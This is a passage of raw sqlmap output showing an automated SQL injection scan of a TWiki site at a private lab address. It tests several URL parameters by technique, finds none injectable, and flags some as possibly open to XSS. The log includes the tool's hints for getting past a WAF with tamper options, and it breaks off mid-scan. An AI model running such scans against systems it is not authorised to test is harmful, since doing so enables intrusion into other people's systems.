[18:49:17] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[18:49:17] [INFO] testing for SQL injection on GET parameter 'topicparent'
[18:49:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:49:17] [WARNING] reflective value(s) found and filtering out
[18:49:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:49:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:49:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:49:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:49:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:49:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:49:20] [INFO] testing 'MySQL inline queries'
[18:49:20] [INFO] testing 'PostgreSQL inline queries'
[18:49:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:49:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:49:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:49:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:49:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:49:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:49:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:49:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:49:23] [INFO] testing 'Oracle AND time-based blind'
[18:49:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:49:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:49:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:49:35] [WARNING] GET parameter 'topicparent' is not injectable
[18:49:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 57:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WikiStyleWord?topicparent=TWiki.TextFormattingFAQ
do you want to test this URL? [Y/n/q]
> Y
[18:49:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WikiStyleWord?topicparent=TWiki.TextFormattingFAQ'
[18:49:35] [INFO] testing connection to the target URL
[18:49:35] [INFO] testing if the target URL is stable
[18:49:36] [INFO] target URL is stable
[18:49:36] [INFO] testing if GET parameter 'topicparent' is dynamic
[18:49:36] [WARNING] GET parameter 'topicparent' does not appear dynamic
[18:49:36] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[18:49:36] [INFO] testing for SQL injection on GET parameter 'topicparent'
[18:49:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:49:36] [WARNING] reflective value(s) found and filtering out
[18:49:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:49:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:49:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:49:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:49:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:49:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:49:39] [INFO] testing 'MySQL inline queries'
[18:49:40] [INFO] testing 'PostgreSQL inline queries'
[18:49:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:49:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:49:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:49:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:49:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:49:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:49:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:49:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:49:43] [INFO] testing 'Oracle AND time-based blind'
[18:49:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:49:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:49:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:49:55] [WARNING] GET parameter 'topicparent' is not injectable
[18:49:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 58:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingFAQ?t=1441456782
do you want to test this URL? [Y/n/q]
> Y
[18:49:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingFAQ?t=1441456782'
[18:49:55] [INFO] testing connection to the target URL
[18:49:55] [INFO] testing if the target URL is stable
[18:49:56] [INFO] target URL is stable
[18:49:56] [INFO] testing if GET parameter 't' is dynamic
[18:49:56] [WARNING] GET parameter 't' does not appear dynamic
[18:49:56] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:49:56] [INFO] testing for SQL injection on GET parameter 't'
[18:49:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:49:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:49:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:49:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:49:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:49:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:50:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:50:00] [INFO] testing 'MySQL inline queries'
[18:50:00] [INFO] testing 'PostgreSQL inline queries'
[18:50:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:50:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:50:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:50:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:50:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:50:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:50:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:50:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:50:03] [INFO] testing 'Oracle AND time-based blind'
[18:50:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:50:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:50:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:50:17] [WARNING] GET parameter 't' is not injectable
[18:50:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 59:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Text *Formatting *FAQ[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:50:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Text *Formatting *FAQ[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:50:17] [INFO] testing connection to the target URL
[18:50:17] [INFO] testing if the target URL is stable
[18:50:18] [INFO] target URL is stable
[18:50:18] [INFO] testing if URI parameter '#1*' is dynamic
[18:50:18] [INFO] confirming that URI parameter '#1*' is dynamic
[18:50:18] [INFO] URI parameter '#1*' is dynamic
[18:50:18] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:50:18] [INFO] testing for SQL injection on URI parameter '#1*'
[18:50:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:50:18] [WARNING] reflective value(s) found and filtering out
[18:50:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:50:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:50:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:50:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:50:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:50:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:50:22] [INFO] testing 'MySQL inline queries'
[18:50:22] [INFO] testing 'PostgreSQL inline queries'
[18:50:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:50:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:50:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:50:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:50:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:50:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:50:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:50:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:50:26] [INFO] testing 'Oracle AND time-based blind'
[18:50:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:50:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:50:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:50:37] [WARNING] URI parameter '#1*' is not injectable
[18:50:37] [INFO] testing if URI parameter '#2*' is dynamic
[18:50:37] [INFO] confirming that URI parameter '#2*' is dynamic
[18:50:37] [INFO] URI parameter '#2*' is dynamic
[18:50:37] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable
[18:50:37] [INFO] testing for SQL injection on URI parameter '#2*'
[18:50:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:50:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:50:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:50:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:50:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:50:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:50:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:50:40] [INFO] testing 'MySQL inline queries'
[18:50:40] [INFO] testing 'PostgreSQL inline queries'
[18:50:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:50:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:50:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:50:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:50:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:50:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:50:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:50:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:50:44] [INFO] testing 'Oracle AND time-based blind'
[18:50:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:50:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:50:55] [WARNING] URI parameter '#2*' is not injectable
[18:50:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 60:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:50:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?skin=print'
[18:50:55] [INFO] testing connection to the target URL
[18:50:55] [INFO] testing if the target URL is stable
[18:50:56] [INFO] target URL is stable
[18:50:56] [INFO] testing if GET parameter 'skin' is dynamic
[18:50:56] [INFO] confirming that GET parameter 'skin' is dynamic
[18:50:56] [INFO] GET parameter 'skin' is dynamic
[18:50:56] [INFO] heuristics detected web page charset 'ascii'
[18:50:56] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:50:56] [INFO] testing for SQL injection on GET parameter 'skin'
[18:50:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:50:57] [WARNING] reflective value(s) found and filtering out
[18:50:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:50:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:50:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:50:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:51:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:51:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:51:00] [INFO] testing 'MySQL inline queries'
[18:51:01] [INFO] testing 'PostgreSQL inline queries'
[18:51:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:51:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:51:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:51:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:51:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:51:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:51:03] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:51:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:51:04] [INFO] testing 'Oracle AND time-based blind'
[18:51:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:51:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:51:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:51:17] [WARNING] GET parameter 'skin' is not injectable
[18:51:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 61:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.15&rev2=1.14
do you want to test this URL? [Y/n/q]
> Y
[18:51:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.15&rev2=1.14'
[18:51:17] [INFO] testing connection to the target URL
[18:51:18] [INFO] testing if the target URL is stable
[18:51:19] [INFO] target URL is stable
[18:51:19] [INFO] testing if GET parameter 'rev1' is dynamic
[18:51:19] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:51:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:51:19] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:51:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:51:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:51:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:51:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:51:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:51:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:51:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:51:22] [INFO] testing 'MySQL inline queries'
[18:51:22] [INFO] testing 'PostgreSQL inline queries'
[18:51:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:51:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:51:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:51:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:51:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:51:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:51:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:51:25] [INFO] testing 'Oracle AND time-based blind'
[18:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:51:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:51:38] [WARNING] GET parameter 'rev1' is not injectable
[18:51:38] [INFO] testing if GET parameter 'rev2' is dynamic
[18:51:38] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:51:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:51:38] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:51:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:51:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:51:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:51:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:51:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:51:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:51:42] [INFO] testing 'MySQL inline queries'
[18:51:43] [INFO] testing 'PostgreSQL inline queries'
[18:51:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:51:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:51:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:51:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:51:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:51:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:51:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:51:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:51:47] [INFO] testing 'Oracle AND time-based blind'
[18:51:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:51:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:51:59] [WARNING] GET parameter 'rev2' is not injectable
[18:51:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 62:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.14
do you want to test this URL? [Y/n/q]
> Y
[18:51:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.14'
[18:51:59] [INFO] testing connection to the target URL
[18:51:59] [INFO] testing if the target URL is stable
[18:52:00] [INFO] target URL is stable
[18:52:00] [INFO] testing if GET parameter 'rev' is dynamic
[18:52:00] [WARNING] GET parameter 'rev' does not appear dynamic
[18:52:00] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:52:00] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:52:00] [INFO] testing for SQL injection on GET parameter 'rev'
[18:52:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:00] [WARNING] reflective value(s) found and filtering out
[18:52:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:52:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:52:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:52:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:52:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:52:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:52:04] [INFO] testing 'MySQL inline queries'
[18:52:04] [INFO] testing 'PostgreSQL inline queries'
[18:52:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:52:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:52:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:52:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:52:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:52:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:52:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:52:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:52:07] [INFO] testing 'Oracle AND time-based blind'
[18:52:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:52:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:52:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:52:21] [WARNING] GET parameter 'rev' is not injectable
[18:52:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:52:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TextFormattingFAQ?rev1=1.14&rev2=1.13'
[18:52:21] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?rev=1.13'
URL 63:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingFAQ?template=oopsmore&param1=1.15&param2=1.15
do you want to test this URL? [Y/n/q]
> Y
[18:52:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TextFormattingFAQ?template=oopsmore&param1=1.15&param2=1.15'
[18:52:21] [INFO] testing connection to the target URL
[18:52:22] [INFO] testing if the target URL is stable
[18:52:22] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:52:22] [INFO] testing if GET parameter 'template' is dynamic
[18:52:23] [INFO] confirming that GET parameter 'template' is dynamic
[18:52:23] [INFO] GET parameter 'template' is dynamic
[18:52:23] [INFO] heuristics detected web page charset 'ascii'
[18:52:23] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:52:23] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:52:23] [INFO] testing for SQL injection on GET parameter 'template'
[18:52:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:23] [WARNING] reflective value(s) found and filtering out
[18:52:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:52:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:52:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:52:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:52:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:52:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:52:25] [INFO] testing 'MySQL inline queries'
[18:52:26] [INFO] testing 'PostgreSQL inline queries'
[18:52:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:52:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:52:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:52:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:52:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:52:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:52:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:52:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:52:28] [INFO] testing 'Oracle AND time-based blind'
[18:52:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:52:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:52:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:52:37] [WARNING] GET parameter 'template' is not injectable
[18:52:37] [INFO] testing if GET parameter 'param1' is dynamic
[18:52:37] [WARNING] GET parameter 'param1' does not appear dynamic
[18:52:37] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:52:38] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:52:38] [INFO] testing for SQL injection on GET parameter 'param1'
[18:52:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:52:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:52:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:52:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:52:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:52:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:52:42] [INFO] testing 'MySQL inline queries'
[18:52:42] [INFO] testing 'PostgreSQL inline queries'
[18:52:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:52:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:52:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:52:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:52:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:52:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:52:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:52:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:52:45] [INFO] testing 'Oracle AND time-based blind'
[18:52:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:52:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:53:00] [WARNING] GET parameter 'param1' is not injectable
[18:53:00] [INFO] testing if GET parameter 'param2' is dynamic
[18:53:00] [WARNING] GET parameter 'param2' does not appear dynamic
[18:53:00] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:53:00] [INFO] testing for SQL injection on GET parameter 'param2'
[18:53:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:53:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:53:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:53:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
